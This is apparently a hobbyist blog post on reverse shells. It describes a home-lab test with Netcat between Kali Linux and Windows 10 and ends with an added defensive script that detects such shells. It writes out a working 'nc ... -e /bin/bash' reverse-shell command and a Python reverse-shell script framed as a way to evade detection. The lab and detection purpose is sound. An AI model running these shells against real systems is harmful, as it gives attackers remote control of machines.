Netcat is a very popular tool among network administrators because it lets them manage machines (PCs and servers) remotely, but unfortunately it is also a favorite tool of hackers: a single command injected through a webpage is enough to create a backdoor (see my previous post "Mr Robot 1 from Vulhub Part 5", where I used a Netcat reverse shell to gain entry to the system).
A reverse shell is one of the important things to know when you aspire to become a penetration tester. It is a technique in which the target computer initiates a connection to the attacker's machine and the input and output of the target system's shell are redirected over that connection, so the attacker can access the shell remotely.
I did an experiment using my Kali Linux in VirtualBox and my Windows 10 host OS (operating system) to check whether it can be done in other scenarios; I have succeeded in code injection so far. The first thing I did was install Netcat. After a little research I found that it comes with the Nmap installation for Windows, so I downloaded Nmap, installed it, went to the directory where it was installed, and in CMD typed "ncat -nvlp 768". I got the following result:
What I just did was set my Windows 10 OS to listen for (or intercept) any data arriving on port 768.
The next step was to open my Kali Linux and type the following in the terminal (by the way, Netcat comes pre-installed in Kali): "nc -nv 192.168.254.181 768 -e /bin/bash".
The following is the result in Kali:
and on my Windows 10 OS:
This means that a connection was established. To check if the connection is working, I typed "ls" from my Windows 10 OS and got the following result:
An alternative to Netcat is a Python program. Check out the code below:

```python
import socket
import subprocess
import os

# Open a TCP connection to the listener (address and port as written in the post).
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("0.0.0.0", 7777))
# Duplicate the socket onto stdin (0), stdout (1) and stderr (2) of this process ...
os.dup2(s.fileno(), 0)
os.dup2(s.fileno(), 1)
os.dup2(s.fileno(), 2)
# ... so the interactive shell started here reads from and writes to the connection.
p = subprocess.call(["/bin/sh", "-i"])
```

To evade detection, hackers sometimes need alternatives to Netcat, such as automating the same steps in a script like this one.
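As an added example (not code from the original post), here is a small Python check, run over a constructed process table, that flags the two patterns shown above from the defender's side: a shell whose standard input, output and error are all the same socket (exactly what the three os.dup2 calls produce) and nc/ncat launched with -e. The Proc record, its field names and the sample rows are my assumptions, modelled on what /proc/<pid>/fd and /proc/<pid>/cmdline expose on Linux.

```python
import re
from dataclasses import dataclass

# Process names treated as interactive shells when their stdio is a socket.
SHELLS = {"sh", "bash", "dash", "zsh", "cmd.exe", "powershell.exe"}
SOCKET_RE = re.compile(r"^socket:\[\d+\]$")   # form of a /proc/<pid>/fd/N symlink target


@dataclass
class Proc:
    pid: int
    comm: str       # executable name (as in /proc/<pid>/comm)
    cmdline: list   # argv (as in /proc/<pid>/cmdline)
    fds: dict       # fd number -> symlink target (as in /proc/<pid>/fd)


def shell_on_socket(p: Proc) -> bool:
    """A shell whose fds 0, 1 and 2 all point at the same socket: the dup2 pattern."""
    if p.comm not in SHELLS:
        return False
    targets = [p.fds.get(n, "") for n in (0, 1, 2)]
    return len(set(targets)) == 1 and SOCKET_RE.match(targets[0]) is not None


def netcat_exec(p: Proc) -> bool:
    """nc/ncat started with -e or -c, i.e. told to run a program over the connection."""
    return p.comm in {"nc", "ncat", "netcat"} and any(a in ("-e", "-c") for a in p.cmdline[1:])


def suspicious(procs):
    """Return the PIDs matching either indicator, in table order."""
    return [p.pid for p in procs if shell_on_socket(p) or netcat_exec(p)]


# Constructed sample process table (not real data); 192.0.2.10 is a documentation address.
SAMPLE = [
    Proc(101, "bash", ["bash"], {0: "/dev/pts/0", 1: "/dev/pts/0", 2: "/dev/pts/0"}),
    Proc(202, "nc", ["nc", "-nv", "192.0.2.10", "768", "-e", "/bin/bash"],
         {0: "/dev/pts/1", 1: "/dev/pts/1", 2: "/dev/pts/1", 3: "socket:[48213]"}),
    Proc(203, "bash", ["/bin/bash"],
         {0: "socket:[48213]", 1: "socket:[48213]", 2: "socket:[48213]"}),
    Proc(301, "sh", ["/bin/sh", "-i"],
         {0: "socket:[48290]", 1: "socket:[48290]", 2: "socket:[48290]"}),
    Proc(400, "sh", ["sh", "-c", "ls"],          # only stdin is a socket: not flagged
         {0: "socket:[48300]", 1: "/dev/null", 2: "/dev/null"}),
]

if __name__ == "__main__":
    print("suspicious PIDs:", suspicious(SAMPLE))   # suspicious PIDs: [202, 203, 301]
```

Shells spawned by inetd-style services also run with socket-backed stdio, so treat a hit as a lead to triage rather than a verdict.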